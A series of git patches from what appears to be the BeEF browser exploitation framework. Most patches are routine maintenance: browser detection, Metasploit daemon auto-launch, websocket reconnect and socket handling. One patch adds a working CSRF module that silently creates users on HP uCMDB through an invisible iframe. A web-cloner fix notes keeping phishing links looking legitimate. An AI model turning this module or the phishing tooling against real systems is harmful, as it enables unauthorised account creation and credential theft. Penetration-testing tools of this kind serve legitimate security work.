 				 :ssl_version => @config['ssl_version'] ,
 				 :context => {}
  			}
+			#auto start msfrpcd
+			if (@config['auto_msfrpcd'] || false)
+				launch_msf = ''
+				@config['msf_path'].each do |path|
+					if File.exist?(path['path'] + 'msfrpcd')
+						launch_msf = path['path'] + 'msfrpcd'
+						print_info 'Found msfrpcd: ' + launch_msf
+					end
+				end
+				if (launch_msf.length > 0)
+					msf_url = ''
+					argssl = ''
+					if not opts[:ssl]
+						argssl = '-S'
+						msf_url = 'http://'
+					else
+						msf_url = 'https://'	
+					end
+
+					msf_url += opts[:host] + ':' + opts[:port].to_s() + opts[:uri]
+				
+					child = IO.popen([launch_msf, "-f", argssl, "-P" , @config['pass'], "-U" , @config['user'], "-u" , opts[:uri], "-a" , opts[:host], "-p" , opts[:port].to_s()], 'r+')
+				
+					print_info 'Attempt to start msfrpcd, this may take a while. PID: ' + child.pid.to_s
+
+					#Give daemon time to launch
+					#poll and giveup after timeout 
+					retries = @config['auto_msfrpcd_timeout']
+					uri = URI(msf_url)
+					http = Net::HTTP.new(uri.host, uri.port)
+
+					if opts[:ssl]
+						http.use_ssl = true
+					end
+					if not @config['ssl_verify']
+						http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+					end
+					headers = {
+    						'Content-Type' => "binary/message-pack"
+					}
+					path = uri.path.empty? ? "/" : uri.path
+					begin
+						sleep 1
+						code = http.head(path, headers).code.to_i
+					rescue Exception
+						retry if (retries -= 1) > 0
+					end
+				else
+					print_error 'Please add a custom path for msfrpcd to the config-file.'
+				end
+			end	
 			super(opts)
 	    end
     

From d04461d8ff6c2a83ff1d29db87db68d0f4f5521b Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Thu, 4 Oct 2012 20:50:51 +0200
Subject: [PATCH 058/397] disable auto msfrpcd

---
 extensions/metasploit/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 609bfe5dd..6f9fedef9 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -35,7 +35,7 @@ beef:
             ssl_verify: true
             callback_host: "127.0.0.1"
             autopwn_url: "autopwn"
-            auto_msfrpcd: true
+            auto_msfrpcd: false
             auto_msfrpcd_timeout: 120
             msf_path: [ 
               {os: 'osx', path: '/tmp/'},

From 03da56fc7dc69d3fc5851614974a462b282d66bb Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Fri, 5 Oct 2012 13:23:24 +0200
Subject: [PATCH 059/397] HP uCMDB CSRF add user module

---
 .../hp_ucmdb_add_user_csrf/command.js         | 41 +++++++++++++++++++
 .../hp_ucmdb_add_user_csrf/config.yaml        | 25 +++++++++++
 .../exploits/hp_ucmdb_add_user_csrf/module.rb | 40 ++++++++++++++++++
 3 files changed, 106 insertions(+)
 create mode 100644 modules/exploits/hp_ucmdb_add_user_csrf/command.js
 create mode 100644 modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
 create mode 100644 modules/exploits/hp_ucmdb_add_user_csrf/module.rb

diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/command.js b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
new file mode 100644
index 000000000..5626d880b
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/command.js
@@ -0,0 +1,41 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {	
+var protocol = '<%= @protocol %>';
+var host = '<%= @host %>';
+var port = '<%= @port %>';
+var usertype = '<%= @usertype %>';
+var customerid = '<%= @customerid %>';
+var username = '<%= @username %>';
+var password = '<%= @password %>';
+
+var url = protocol + '://' + host + ':' + port + '/' + 'HtmlAdaptor?action=invokeOpByName&name=UCMDB:service=Security%20Services&methodName=' + usertype;
+url += '&arg0=' + customerid + '&arg1=' + username + '&arg2=' + password;
+
+if (usertype == 'createIntegrationUser'){
+	url += '&arg3=';
+}
+
+var ucmdb_iframe = beef.dom.createInvisibleIframe();
+ucmdb_iframe.setAttribute('src', url);
+
+cleanup = function() {
+    document.body.removeChild(ucmdb_iframe);
+}
+setTimeout("cleanup()", 15000);
+
+beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Command executed");
+});
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
new file mode 100644
index 000000000..4202b6c98
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/config.yaml
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+    module:
+        hp_ucmdb_add_user_csrf:
+            enable: true
+            category: "Exploits"
+            name: "HP uCMDB 9.0x add user CSRF"
+            description: "This module attempts to add additional users to the HP uCMDB (universal configuration management database).<br />For more information please refer to <a href='http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html'>http://bmantra.blogspot.com/2012/10/hp-ucmdb-jmx-console-csrf.html</a>"
+            authors: ["Bart Leppens"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/hp_ucmdb_add_user_csrf/module.rb b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
new file mode 100644
index 000000000..3213161a7
--- /dev/null
+++ b/modules/exploits/hp_ucmdb_add_user_csrf/module.rb
@@ -0,0 +1,40 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
+          'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
+          'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
+        },
+        {'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
+        {'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
+        { 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
+          'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
+          'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
+        },
+		{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
+		{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
+		{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+
+end

From 0f81e38635ff4271ba38a54958e81e0fc26254d7 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 7 Oct 2012 17:57:51 +1030
Subject: [PATCH 060/397] Fix YAML config:
 extensions/social_engineering/config.yaml

Prevents this error due to lack of white space between array elements:

`[!] Unable to load extension configuration '/pentest/web/beef-git/extensions/social_engineering/config.yaml'`
---
 extensions/social_engineering/config.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/extensions/social_engineering/config.yaml b/extensions/social_engineering/config.yaml
index 9bbbc83f7..bd5ffe0da 100644
--- a/extensions/social_engineering/config.yaml
+++ b/extensions/social_engineering/config.yaml
@@ -44,7 +44,7 @@ beef:
                     edfenergy:
                        # my-account.edfenergy.com_mod is an example of a modified page (manually modified in order to
                        # intercept POST requests) to be served with the web_cloner using use_existing = true
-                       images: ["corner-tl.png", "main.png","edf_logo.png","promo-corner-left.png","promo-corner-right-arrow.png","promo-reflection.png","2012.png","corner-bl.png","corner-br.png","bottom-border.png"]
+                       images: ["corner-tl.png", "main.png", "edf_logo.png", "promo-corner-left.png", "promo-corner-right-arrow.png", "promo-reflection.png", "2012.png", "corner-bl.png", "corner-br.png", "bottom-border.png"]
                        images_cids:
                           cid1: "corner-tl.png"
                           cid2:  "main.png"

From 22bb8998b259aefbf30fe4bcfdba30c50d48101a Mon Sep 17 00:00:00 2001
From: bmantra <bart.leppens@gmail.com>
Date: Sun, 7 Oct 2012 19:26:02 +0200
Subject: [PATCH 061/397] added more default paths for the msf-autolaunch

---
 extensions/metasploit/config.yaml | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/extensions/metasploit/config.yaml b/extensions/metasploit/config.yaml
index 6f9fedef9..160a7fe0d 100644
--- a/extensions/metasploit/config.yaml
+++ b/extensions/metasploit/config.yaml
@@ -38,8 +38,10 @@ beef:
             auto_msfrpcd: false
             auto_msfrpcd_timeout: 120
             msf_path: [ 
-              {os: 'osx', path: '/tmp/'},
-              {os: 'bt5', path: '/opt/metasploit/'},
+              {os: 'osx', path: '/opt/local/msf/'},
+              {os: 'bt5r3', path: '/opt/metasploit/msf3/'},
+              {os: 'bt5', path: '/opt/framework3/msf3/'},
+              {os: 'backbox', path: '/opt/metasploit3/msf3/'},
               {os: 'win', path: 'c:\metasploit\msf3\'},
               {os: 'custom', path: ''}
             ]

From aad6228ea8068a43a3d5d089470ef69b4c004098 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Thu, 11 Oct 2012 11:21:06 +0100
Subject: [PATCH 062/397] Fix issues #757 : normalizing mount points for
 web_cloner in case they contain params.

---
 extensions/social_engineering/web_cloner/web_cloner.rb | 7 +++++++
 1 file changed, 7 insertions(+)

diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 19313f365..78656fed9 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -103,6 +103,13 @@ module BeEF
 
             file_path = @cloned_pages_dir + output_mod # the path to the cloned_pages directory where we have the HTML to serve
 
+            # if the user wants to clone http://a.com/login.jsp?cas=true&ciccio=false , split the URL mounting only the path.
+            # then the phishing link can be used anyway with all the proper parameters to looks legit.
+            if mount.include?("?")
+              mount = mount.split("?").first
+              print_info "Normalizing mount point. You can still use params for the phishing link."
+            end
+
             # Check if the original URL can be framed
             frameable = is_frameable(url)
 

From b20dec0adf9c33778e1903d80471fc1d532ac114 Mon Sep 17 00:00:00 2001
From: radoen <scream1988@gmail.com>
Date: Sun, 14 Oct 2012 01:52:17 +0200
Subject: [PATCH 063/397] ISSUES #713 Fixed

---
 core/main/client/websocket.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/websocket.js b/core/main/client/websocket.js
index 69ab27515..b834f32e4 100644
--- a/core/main/client/websocket.js
+++ b/core/main/client/websocket.js
@@ -58,11 +58,21 @@ beef.websocket = {
             eval(message.data);
         }
 
+        this.socket.onclose = function () {
+        setTimeout(function(){beef.websocket.start()}, 5000);
+        }
+
     },
 
     send:function (data) {
+        try {
         this.socket.send(data);
-//        console.log("Sent [" + data + "]");
+        //console.log("Sent [" + data + "]");
+         }
+         catch(err){
+         //console.log(err);
+
+         }
     },
 
     alive: function (){

From 2863fafc2af5464e1dfc5d08605431acd1a22db7 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Tue, 16 Oct 2012 20:39:28 +1030
Subject: [PATCH 064/397] Added support for Firefox 16

Fixed bug where new versions of Firefox are detected as Safari

Added placeholder for IE10
---
 core/main/client/browser.js | 82 +++++++++++++++++++++++--------------
 1 file changed, 52 insertions(+), 30 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 97b8317a6..162f2f651 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -60,12 +60,22 @@ beef.browser = {
 		return !!window.XMLHttpRequest && !window.chrome && !window.opera && !!document.documentMode && !!window.XDomainRequest && !!window.performance;
 	},
 	
+	/**
+	 *
+	 * Returns true if IE10.
+	 * @example: beef.browser.isIE10()
+	 */
+	 // placeholder
+	isIE10: function() {
+		return false;
+	},
+
 	/**
 	 * Returns true if IE.
 	 * @example: beef.browser.isIE()
 	 */
 	isIE: function() {
-		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9();
+		return this.isIE6() || this.isIE7() || this.isIE8() || this.isIE9() || this.isIE10();
 	},
 	
 	/**
@@ -196,12 +206,20 @@ beef.browser = {
 		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/15\./) != null;
 	},
 
+	/**
+	 * Returns true if FF16
+	 * @example: beef.browser.isFF16()
+	 */
+	isFF16: function() {
+		return !!window.history.replaceState && window.navigator.userAgent.match(/Firefox\/16\./) != null;
+	},
+
 	/**
 	 * Returns true if FF.
 	 * @example: beef.browser.isFF()
 	 */
 	isFF: function() {
-		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15();
+		return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16();
 	},
 
 	/**
@@ -209,7 +227,7 @@ beef.browser = {
 	 * @example: beef.browser.isS4()
 	 */
 	isS4: function() {
-		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return (window.navigator.userAgent.match(/ Version\/4\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
 	
 	/**
@@ -217,23 +235,23 @@ beef.browser = {
 	 * @example: beef.browser.isS5()
 	 */
 	isS5: function() {
-		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return (window.navigator.userAgent.match(/ Version\/5\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
 	},
 
-    /**
-     * Returns true if Safari 6.xx
-     * @example: beef.browser.isS6()
-     */
-    isS6: function() {
-        return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
-    },
+	/**
+ 	 * Returns true if Safari 6.xx
+	 * @example: beef.browser.isS6()
+	 */
+	isS6: function() {
+		return (window.navigator.userAgent.match(/ Version\/6\.\d/) != null && window.navigator.userAgent.match(/Safari\/\d/) != null && !window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome && !("MozWebSocket" in window));
+	},
 	
 	/**
 	 * Returns true if Safari.
 	 * @example: beef.browser.isS()
 	 */
 	isS: function() {
-		return this.isS4() || this.isS5() || this.isS6() || (!window.globalStorage && !!window.getComputedStyle && !window.opera && !window.chrome);
+		return this.isS4() || this.isS5() || this.isS6();
 	},
 
 	/**
@@ -449,11 +467,11 @@ beef.browser = {
 			C14:	this.isC14(),	// Chrome 14
 			C15:    this.isC15(),   // Chrome 15
 			C16:	this.isC16(),	// Chrome 16
-            C17:	this.isC17(),	// Chrome 17
+			C17:	this.isC17(),	// Chrome 17
 			C18:	this.isC18(),	// Chrome 18
 			C19:	this.isC19(),	// Chrome 19
 			C20:	this.isC20(),	// Chrome 20
-            C21:	this.isC21(),	// Chrome 21
+			C21:	this.isC21(),	// Chrome 21
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -472,24 +490,26 @@ beef.browser = {
 			FF13:	this.isFF13(),	// Firefox 13
 			FF14:	this.isFF14(),	// Firefox 14
 			FF15:	this.isFF15(),	// Firefox 15
+			FF16:	this.isFF16(),	// Firefox 16
 			FF:	this.isFF(),	// Firefox any version
 
 			IE6:	this.isIE6(),	// Internet Explorer 6
 			IE7:	this.isIE7(),	// Internet Explorer 7
 			IE8:	this.isIE8(),	// Internet Explorer 8
 			IE9:	this.isIE9(),	// Internet Explorer 9
+			IE10:	this.isIE10(),	// Internet Explorer 10
 			IE:	this.isIE(),	// Internet Explorer any version
 
 			O9_52:  this.isO9_52(), // Opera 9.50 through 9.52
 			O9_60:  this.isO9_60(), // Opera 9.60 through 9.64
 			O10:    this.isO10(),  	// Opera 10.xx
 			O11:    this.isO11(),  	// Opera 11.xx
-            O12:    this.isO12(),  	// Opera 11.xx
+			O12:    this.isO12(),  	// Opera 11.xx
 			O:      this.isO(), 	// Opera any version
 
 			S4:	this.isS4(),	// Safari 4.xx
 			S5:	this.isS5(),	// Safari 5.xx
-            S6: this.isS6(),   // Safari 6.x
+			S6:	this.isS6(),	// Safari 6.x
 			S:	this.isS()	// Safari any version
 		}
 	},
@@ -514,13 +534,13 @@ beef.browser = {
 		if (this.isC14())	{ return '14' }; 	// Chrome 14
 		if (this.isC15())	{ return '15' }; 	// Chrome 15
 		if (this.isC16())	{ return '16' };	// Chrome 16
-        if (this.isC17())	{ return '17' };	// Chrome 17
-		if (this.isC18())   { return '18' };    // Chrome 18
-		if (this.isC19())   { return '19' };    // Chrome 19
+		if (this.isC17())	{ return '17' };	// Chrome 17
+		if (this.isC18())	{ return '18' };	// Chrome 18
+		if (this.isC19())	{ return '19' };	// Chrome 19
 		if (this.isC20())	{ return '20' };	// Chrome 20
-        if (this.isC21())	{ return '21' };	// Chrome 21
+		if (this.isC21())	{ return '21' };	// Chrome 21
 
-        if (this.isFF2())	{ return '2'  };	// Firefox 2
+		if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3
 		if (this.isFF3_5())	{ return '3.5'};	// Firefox 3.5
 		if (this.isFF3_6())	{ return '3.6'};	// Firefox 3.6
@@ -535,22 +555,24 @@ beef.browser = {
 		if (this.isFF12())	{ return '12' };	// Firefox 12
 		if (this.isFF13())	{ return '13' };	// Firefox 13
 		if (this.isFF14())	{ return '14' };	// Firefox 14
-		if (this.isFF15())  { return '15' };    // Firefox 15
+		if (this.isFF15())	{ return '15' };	// Firefox 15
+		if (this.isFF16())	{ return '16' };	// Firefox 16
 
 		if (this.isIE6())	{ return '6'  };	// Internet Explorer 6
 		if (this.isIE7())	{ return '7'  };	// Internet Explorer 7
 		if (this.isIE8())	{ return '8'  };	// Internet Explorer 8
 		if (this.isIE9())	{ return '9'  };	// Internet Explorer 9
+		if (this.isIE10())	{ return '10' };	// Internet Explorer 10
 
 		if (this.isS4())	{ return '4'  };	// Safari 4
 		if (this.isS5())	{ return '5'  };	// Safari 5
-        if (this.isS6())	{ return '6'  };	// Safari 5
+		if (this.isS6())	{ return '6'  };	// Safari 5
 
-        if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
+		if (this.isO9_52())	{ return '9.5'};	// Opera 9.5x
 		if (this.isO9_60())	{ return '9.6'};	// Opera 9.6
 		if (this.isO10())	{ return '10' };	// Opera 10.xx
 		if (this.isO11())	{ return '11' };	// Opera 11.xx
-        if (this.isO12())	{ return '12' };	// Opera 12.xx
+		if (this.isO12())	{ return '12' };	// Opera 12.xx
 
 		return 'UNKNOWN';				// Unknown UA
 	},
@@ -600,11 +622,11 @@ beef.browser = {
 	},
 
 	/**
-	* Checks if the zombie has Java enabled.
+	 * Checks if the zombie has Java enabled.
  	 * @return: {Boolean} true or false.
-     *
-     * @example: if(beef.browser.javaEnabled()) { ... }
-     */
+	 *
+	 * @example: if(beef.browser.javaEnabled()) { ... }
+	 */
 	javaEnabled: function() {
 
 		return (!!window.navigator.javaEnabled());
@@ -652,7 +674,7 @@ beef.browser = {
 			return false;
 		}
 
-        // This is a temporary fix as this does not work on Safari and Chrome
+		// This is a temporary fix as this does not work on Safari and Chrome
 		// Chrome requires manual user intervention even with unsigned applets.
 		// Safari requires a few seconds to load the applet.
 		if (beef.browser.isC() || beef.browser.isS()) {

From 042ee1b0aac0b13765992b5fd7c34fafc592c462 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 19 Oct 2012 09:15:07 +1030
Subject: [PATCH 065/397] Hide QRcode for localhost/127.0.0.1 interface

---
 extensions/qrcode/qrcode.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/extensions/qrcode/qrcode.rb b/extensions/qrcode/qrcode.rb
index acac7cf35..5714501f5 100644
--- a/extensions/qrcode/qrcode.rb
+++ b/extensions/qrcode/qrcode.rb
@@ -26,6 +26,7 @@ module Qrcode
       
       configuration = BeEF::Core::Configuration.instance
       BeEF::Core::Console::Banners.interfaces.each do |int|
+        next if int == "localhost" or int == "127.0.0.1"
         print_success "QRCode images available for interface: #{int}"
         data = ""
         configuration.get("beef.extension.qrcode.target").each do |target|

From 91e141188883a736a35bb171186a4e7c4ba0ff59 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 19 Oct 2012 09:35:29 +1030
Subject: [PATCH 066/397] Added support for Chrome 22

---
 core/main/client/browser.js | 12 +++++++++++-
 1 file changed, 11 insertions(+), 1 deletion(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 162f2f651..6a680875c 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -390,12 +390,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==21)?true:false);
     },
 
+	/**
+	 * Returns true if Chrome 22.
+	 * @example: beef.browser.isC22()
+	 */
+	isC22: function() {
+		return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
+	},
+
 	/**
 	 * Returns true if Chrome.
 	 * @example: beef.browser.isC()
 	 */
 	isC: function() {
-		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21();
+		return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22();
 	},
 
 	/**
@@ -472,6 +480,7 @@ beef.browser = {
 			C19:	this.isC19(),	// Chrome 19
 			C20:	this.isC20(),	// Chrome 20
 			C21:	this.isC21(),	// Chrome 21
+			C22:	this.isC22(),	// Chrome 22
 			C:	this.isC(), 	// Chrome any version
 
 			FF2:	this.isFF2(),	// Firefox 2
@@ -539,6 +548,7 @@ beef.browser = {
 		if (this.isC19())	{ return '19' };	// Chrome 19
 		if (this.isC20())	{ return '20' };	// Chrome 20
 		if (this.isC21())	{ return '21' };	// Chrome 21
+		if (this.isC22())   { return '22' };    // Chrome 22
 
 		if (this.isFF2())	{ return '2'  };	// Firefox 2
 		if (this.isFF3())	{ return '3'  };	// Firefox 3

From af53f0fd0b73cf43afe79fc05be5501d89734ced Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 15:22:04 +1100
Subject: [PATCH 067/397] Catching exception in web_cloner when determining if
 page can be framed.

---
 .../web_cloner/web_cloner.rb                  | 35 +++++++++++--------
 1 file changed, 21 insertions(+), 14 deletions(-)

diff --git a/extensions/social_engineering/web_cloner/web_cloner.rb b/extensions/social_engineering/web_cloner/web_cloner.rb
index 78656fed9..fcd527cf2 100644
--- a/extensions/social_engineering/web_cloner/web_cloner.rb
+++ b/extensions/social_engineering/web_cloner/web_cloner.rb
@@ -147,22 +147,29 @@ module BeEF
         # check if the original URL can be framed. NOTE: doesn't check for framebusting code atm
         def is_frameable(url)
           result = true
-          uri = URI(url)
-          http = Net::HTTP.new(uri.host, uri.port)
-          if uri.scheme == "https"
-            http.use_ssl = true
-            http.verify_mode = OpenSSL::SSL::VERIFY_NONE
-          end
-          request = Net::HTTP::Get.new(uri.request_uri)
-          response = http.request(request)
-          frame_opt = response["X-Frame-Options"]
-
-          if frame_opt != nil
-            if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
-              result = false
+          begin
+            uri = URI(url)
+            http = Net::HTTP.new(uri.host, uri.port)
+            if uri.scheme == "https"
+              http.use_ssl = true
+              http.verify_mode = OpenSSL::SSL::VERIFY_NONE
             end
+            request = Net::HTTP::Get.new(uri.request_uri)
+            response = http.request(request)
+            frame_opt = response["X-Frame-Options"]
+
+            if frame_opt != nil
+              if frame_opt.casecmp("DENY") == 0 || frame_opt.casecmp("SAMEORIGIN") == 0
+                result = false
+              end
+            end
+            print_info "Page can be framed: [#{result}]"
+          rescue Exception => e
+            result = false
+            print_error "Unable to determine if page can be framed. Page can be framed: [#{result}]"
+            print_debug e
+            #print_debug e.backtrace
           end
-          print_info "Page can be framed: [#{result}]"
           result
         end
 

From cbbb9e0d67d8eb21220900c267814a37102c5df4 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 15:24:21 +1100
Subject: [PATCH 068/397] Added feature to bind_socket in AssetHandler: now
 it's possible to retrieve the raw data sent to the socket.

---
 core/main/network_stack/assethandler.rb | 37 ++++++++++++++++++++-----
 1 file changed, 30 insertions(+), 7 deletions(-)

diff --git a/core/main/network_stack/assethandler.rb b/core/main/network_stack/assethandler.rb
index 4ce4f00c7..2e1162e21 100644
--- a/core/main/network_stack/assethandler.rb
+++ b/core/main/network_stack/assethandler.rb
@@ -63,7 +63,7 @@ module Handlers
     # use it like: bind_socket("irc","0.0.0.0",6667)
     def bind_socket(name, host, port)
       if @sockets[name] != nil
-        print_error "Thread [#{name}] is already listening on [#{host}:#{port}]."
+        print_error "Bind Socket [#{name}] is already listening on [#{host}:#{port}]."
       else
         t = Thread.new {
           server = TCPServer.new(host,port)
@@ -71,24 +71,47 @@ module Handlers
             Thread.start(server.accept) do |client|
               data = ""
               recv_length = 1024
+              threshold = 1024 * 512
               while (tmp = client.recv(recv_length))
                 data += tmp
                 break if tmp.length < recv_length || tmp.length == recv_length
+                # 512 KB max of incoming data
+                break if data > threshold
+              end
+              if  data.size > threshold
+                print_error "More than 512 KB of data incoming for Bind Socket [#{name}]. For security purposes client connection is closed, and data not saved."
+              else
+                @sockets[name] = {'thread' => t, 'data' => data}
+                print_info "Bind Socket [#{name}] received [#{data.size}] bytes of data."
+                print_debug "Bind Socket [#{name}] received:\n#{data}"
               end
               client.close
-              print_debug "Bind Socket on Thread [#{name}] received:\n#{data}"
             end
           end
         }
-        @sockets[name] = t
-        print_info "Thread [#{name}] listening on [#{host}:#{port}]."
+        print_info "Bind socket [#{name}] listening on [#{host}:#{port}]."
       end
     end
 
+    def get_socket_data(name)
+      data = nil
+      if @sockets[name] != nil
+        data = @sockets[name]['data']
+      else
+        print_error "Bind Socket [#{name}] does not exists."
+      end
+      data
+    end
+
     def unbind_socket(name)
-      t = @sockets[name]
-      Thread.kill(t)
-      print_info "Thread [#{name}] killed."
+        t = @sockets[name]['thread']
+        if t.alive?
+          print_debug "Thread to be killed: #{t}"
+          Thread.kill(t)
+          print_info "Bind Socket [#{name}] killed."
+        else
+          print_info "Bind Socket [#{name}] ALREADY killed."
+        end
     end
 
     # Builds a URL based on the path and extension, if neither are passed a random URL will be generated

From 5a2f30a0c042360c09cc63072bcc3fe3e10656dd Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 22 Oct 2012 15:30:27 +1100
Subject: [PATCH 069/397] Added a bunch of new RESTful API calls: get
 categories, search module by name.

---
 core/bootstrap.rb                         |  1 +
 core/main/rest/api.rb                     |  8 ++++
 core/main/rest/handlers/categories.rb     | 49 +++++++++++++++++++++++
 core/main/rest/handlers/hookedbrowsers.rb |  6 +++
 core/main/rest/handlers/logs.rb           |  4 ++
 core/main/rest/handlers/modules.rb        | 37 ++++++++++++++---
 6 files changed, 99 insertions(+), 6 deletions(-)
 create mode 100644 core/main/rest/handlers/categories.rb

diff --git a/core/bootstrap.rb b/core/bootstrap.rb
index 0ae748c22..3db52a26c 100644
